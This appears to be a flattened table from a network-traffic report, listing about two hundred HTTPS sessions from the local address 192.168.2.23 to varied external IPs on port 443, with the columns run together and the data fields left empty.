                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19234192.168.2.2342654192.135.86.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19235192.168.2.235544250.86.37.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19236192.168.2.2355056153.212.176.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19237192.168.2.233321280.19.4.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19238192.168.2.234581071.208.127.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19239192.168.2.2336222143.205.170.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19240192.168.2.2340814100.251.236.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19241192.168.2.2339856138.37.4.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19242192.168.2.2340270199.186.251.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19243192.168.2.2333256126.22.53.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19244192.168.2.234007419.23.63.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19245192.168.2.235172019.233.155.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19246192.168.2.2347690140.32.154.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19247192.168.2.2350604187.115.52.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19248192.168.2.2337822206.32.246.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19249192.168.2.2332900179.56.140.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19250192.168.2.2349218221.104.221.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19251192.168.2.235500475.22.90.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19252192.168.2.2355060101.126.182.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19253192.168.2.236069434.246.142.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19254192.168.2.233883064.131.159.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19255192.168.2.233839883.230.247.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19256192.168.2.2343924107.200.227.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19257192.168.2.2336696106.23.243.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19258192.168.2.2348166209.148.152.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19259192.168.2.2353428222.166.50.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19260192.168.2.2339976197.37.240.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19261192.168.2.2333926126.208.80.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19262192.168.2.2347934124.106.50.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19263192.168.2.2357776185.234.123.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19264192.168.2.2352168172.127.165.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19265192.168.2.2358528219.251.246.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19266192.168.2.2347428219.183.69.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19267192.168.2.233972670.250.148.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19268192.168.2.2354792177.38.29.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19269192.168.2.234296680.50.38.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19270192.168.2.234376486.63.201.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19271192.168.2.233887635.96.242.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19272192.168.2.2358846208.41.134.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19273192.168.2.2349272135.163.92.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19274192.168.2.235572635.91.216.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19275192.168.2.2337418107.124.151.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19276192.168.2.2343284121.196.149.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19277192.168.2.235645879.84.131.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19278192.168.2.234770817.151.170.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19279192.168.2.233821288.191.9.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19280192.168.2.2339312163.52.149.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19281192.168.2.233759680.177.54.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19282192.168.2.2333230145.150.181.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19283192.168.2.23393308.221.107.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19284192.168.2.236085699.141.249.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19285192.168.2.2353260108.82.134.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19286192.168.2.2335902136.72.216.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19287192.168.2.2350330103.59.158.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19288192.168.2.2340370122.203.171.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19289192.168.2.2343328201.63.50.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19290192.168.2.2346848189.226.75.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19291192.168.2.234451088.254.233.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19292192.168.2.2349560200.93.138.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19293192.168.2.233495463.226.17.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19294192.168.2.233504432.114.183.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19295192.168.2.2341070159.218.30.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19296192.168.2.234797693.119.239.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19297192.168.2.2342920132.220.178.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19298192.168.2.2340874119.239.133.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19299192.168.2.234611461.144.166.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19300192.168.2.2352904150.194.227.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19301192.168.2.234604012.72.28.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19302192.168.2.2344386154.222.201.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19303192.168.2.235357450.20.139.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19304192.168.2.234137666.73.113.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19305192.168.2.234447851.135.71.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19306192.168.2.2342590169.58.155.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19307192.168.2.2349424205.222.127.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19308192.168.2.2341612153.114.125.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19309192.168.2.234841059.122.50.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19310192.168.2.233795635.137.150.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19311192.168.2.23419302.204.33.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19312192.168.2.2342694102.221.17.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19313192.168.2.233544234.165.20.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19314192.168.2.2360758145.194.118.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19315192.168.2.234546077.24.83.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19316192.168.2.234011827.244.88.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19317192.168.2.2346438110.63.84.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19318192.168.2.233304468.47.116.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19319192.168.2.235107088.29.20.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19320192.168.2.2351312209.211.166.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19321192.168.2.2357122154.0.159.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19322192.168.2.234418876.125.27.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19323192.168.2.2337292132.226.236.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19324192.168.2.2345184145.62.252.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19325192.168.2.234269418.91.30.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19326192.168.2.235681673.247.36.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19327192.168.2.234010060.188.177.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19328192.168.2.2355108128.124.206.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19329192.168.2.235618664.163.209.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19330192.168.2.233923451.253.192.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19331192.168.2.234044636.125.31.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19332192.168.2.235974479.219.194.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19333192.168.2.2346724160.189.222.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19334192.168.2.235864461.249.7.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19335192.168.2.2346074167.44.197.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19336192.168.2.2357658130.170.122.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19337192.168.2.233425092.79.235.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19338192.168.2.233417664.43.103.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19339192.168.2.2337118154.26.245.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19340192.168.2.233785663.135.185.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19341192.168.2.233951487.230.113.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19342192.168.2.233354263.152.98.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19343192.168.2.2333638192.3.152.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19344192.168.2.233869824.61.8.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19345192.168.2.235205085.66.89.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19346192.168.2.234945242.91.98.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19347192.168.2.234183247.63.15.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19348192.168.2.235992094.168.82.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19349192.168.2.2352098107.16.236.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19350192.168.2.2346966135.59.235.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19351192.168.2.2339900197.120.38.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19352192.168.2.2340176189.1.249.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19353192.168.2.2353212105.172.35.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19354192.168.2.2358384188.204.189.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19355192.168.2.2350990124.71.54.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19356192.168.2.2356118200.0.65.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19357192.168.2.2332794129.6.186.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19358192.168.2.2350918166.67.143.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19359192.168.2.2338546183.99.231.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19360192.168.2.2345094123.181.222.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19361192.168.2.235183268.244.178.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19362192.168.2.2355016154.75.213.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19363192.168.2.233863898.111.155.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19364192.168.2.2352068104.240.111.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19365192.168.2.234588658.248.203.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19366192.168.2.2338946174.43.39.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19367192.168.2.234674084.113.246.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19368192.168.2.233853879.151.71.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19369192.168.2.234608254.13.70.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19370192.168.2.233802096.181.110.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19371192.168.2.234802438.83.5.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19372192.168.2.2343000135.112.171.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19373192.168.2.2354780210.226.219.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19374192.168.2.234198848.161.55.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19375192.168.2.2336280103.108.221.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19376192.168.2.2348158113.156.11.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19377192.168.2.235408637.44.13.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19378192.168.2.2341468205.153.234.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19379192.168.2.2334898139.28.215.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19380192.168.2.2334426155.253.107.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19381192.168.2.2339968221.129.163.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19382192.168.2.2348100135.131.194.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19383192.168.2.234347293.24.138.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19384192.168.2.23469308.87.13.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19385192.168.2.235240878.18.235.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19386192.168.2.2351346118.92.102.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19387192.168.2.2341364210.231.202.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19388192.168.2.2341694131.69.8.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19389192.168.2.2335186150.139.75.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19390192.168.2.2351970176.5.74.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19391192.168.2.2358556122.215.252.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19392192.168.2.2356870188.145.174.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19393192.168.2.235469276.130.235.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19394192.168.2.234212624.218.205.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19395192.168.2.2338664188.176.79.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19396192.168.2.2336208156.118.175.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19397192.168.2.234532652.101.161.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19398192.168.2.2335760129.161.16.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19399192.168.2.235754080.230.66.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19400192.168.2.234912667.54.48.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19401192.168.2.2342054133.1.10.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19402192.168.2.2343662143.144.46.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19403192.168.2.2343846155.220.36.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19404192.168.2.2348878152.54.238.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19405192.168.2.2360784162.177.71.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19406192.168.2.2335682185.62.40.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19407192.168.2.2357624183.64.79.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19408192.168.2.235643234.209.1.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19409192.168.2.2360772115.74.80.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19410192.168.2.235839664.94.185.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19411192.168.2.235300267.118.146.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19412192.168.2.2352104105.249.117.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19413192.168.2.2351202125.35.31.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19414192.168.2.2353446173.147.29.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19415192.168.2.23429569.138.245.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19416192.168.2.2334122220.193.139.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19417192.168.2.2357408101.84.97.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19418192.168.2.2355956220.81.61.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19419192.168.2.235541859.98.33.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19420192.168.2.2352516170.159.133.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19421192.168.2.2337018108.166.20.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19422192.168.2.2352240126.235.233.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19423192.168.2.233645069.36.8.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19424192.168.2.2346692211.140.62.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19425192.168.2.236015668.117.218.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19426192.168.2.2334012141.236.2.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19427192.168.2.2355950142.152.182.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19428192.168.2.235776845.147.38.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19429192.168.2.233543847.88.242.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19430192.168.2.234611052.214.67.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19431192.168.2.2359418164.169.116.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19432192.168.2.235944020.123.161.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19433192.168.2.2333022169.36.152.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19434192.168.2.236075859.28.144.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19435192.168.2.235854612.203.172.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19436192.168.2.234115654.236.235.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19437192.168.2.2352456189.6.204.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19438192.168.2.233448012.48.29.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19439192.168.2.2349980150.197.189.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19440192.168.2.2348648100.127.97.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19441192.168.2.2339396118.248.91.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19442192.168.2.2353382200.196.22.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19443192.168.2.2339062132.157.92.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19444192.168.2.2339854187.64.87.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19445192.168.2.2347700223.24.240.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19446192.168.2.2357912138.43.109.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19447192.168.2.2351948187.105.125.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19448192.168.2.2348024131.1.167.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19449192.168.2.2348026170.115.197.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19450192.168.2.235146887.74.14.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19451192.168.2.2357846158.152.199.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19452192.168.2.235887259.136.242.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19453192.168.2.235890860.128.67.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19454192.168.2.2338022170.130.116.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
